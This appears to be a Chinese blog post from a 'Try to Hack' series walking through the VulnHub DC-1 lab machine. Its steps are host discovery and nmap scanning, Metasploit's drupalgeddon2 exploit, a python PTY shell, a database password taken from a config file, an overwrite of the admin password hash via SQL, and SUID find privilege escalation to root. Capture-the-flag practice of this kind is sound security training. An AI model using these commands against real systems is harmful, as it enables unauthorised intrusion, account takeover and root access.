当前位置:网站首页>【Try to Hack】vulnhub DC1

【Try to Hack】vulnhub DC1

2022-06-25 14:22:00 开心星人

博客主页:开心星人的博客主页
系列专栏:Try to Hack
欢迎关注点赞收藏️留言
首发时间:2022年6月25日
作者水平很有限,如果发现错误,还望告知,感谢!

靶场下载和安装

下载地址:https://www.vulnhub.com/entry/dc-1-1,292/
在这里插入图片描述
我也不太懂,我选了第二个,可以用

用vmmare打开DC-1.ova
在这里插入图片描述
在这里插入图片描述
选设置
在这里插入图片描述
要选NAT模式

kali也要选NAT模式,这样攻击机和靶机就处于同一内网

开始渗透

主机发现
netdiscover
nmap -sP
arp-scan -l
这里用netdiscover
在这里插入图片描述
太大太小的可能是网关,可以看【Try to Hack】ip地址
所以DC-1 的ip为192.168.88.138

信息收集
nmap -sV 192.168.88.138
在这里插入图片描述
浏览器看看80端口
在这里插入图片描述

drupal这个cms搭建的
在这里插入图片描述

直接上msf
msfconsloe
在这里插入图片描述
search drupal
在这里插入图片描述
随便选择一个模块(基本上都能拿到shell)
use exploit/unix/webapp/drupal_drupalgeddon2
在这里插入图片描述
show options
在这里插入图片描述
set rhost 192.168.88.138 靶机的ip

run
在这里插入图片描述

拿到了shell

使用python获得一个交互式的shell
python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述
在这里插入图片描述
拿到了第一个flag1

提示我们看配置文件
在这里插入图片描述
在这里插入图片描述
拿到了第二个flag,并获得下一步的提示

还看到了数据库的账号和密码
mysql -u dbuser -p
输入密码
R0ck3t
在这里插入图片描述

进入数据库了
show databases;
在这里插入图片描述
show tables from drupaldb;
在这里插入图片描述
看users表
use drupaldb
select * from users;
在这里插入图片描述
看到了admin和密码的hash
说实话我确实看不出来这是哪种hash算法,想尝试破解这个密码,但是弄不出来
看wp
在scripts录有password-hash.sh文件,可以用该文件生成自己的密码hash值替换数据库hash
给了有hash的算法
php scripts/password-hash.sh 12345
在这里插入图片描述
获得12345的hash

替换数据库中的密码
update drupaldb.users set pass="$S$D1K11z6Umizyw8cxeck4ZVfihCCk41tqi4fEV6e5Tk6lMp8dAaBm" where name="admin";
在这里插入图片描述
成功

在这里插入图片描述
登录进入后台了

在这里插入图片描述
找了好一会,找到了flag3
在这里插入图片描述
suid之find提权 Try to Hack】Linux suid提权

查找拥有suid权限的二进制文件
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
/usr/bin/find . -exec /bin/sh \;
在这里插入图片描述
提权成功
一个flag在/etc/passwd里,一个在/root下
在这里插入图片描述
在这里插入图片描述
结束

原网站

版权声明
本文为[开心星人]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_55675216/article/details/125249818

边栏推荐

猜你喜欢

随机推荐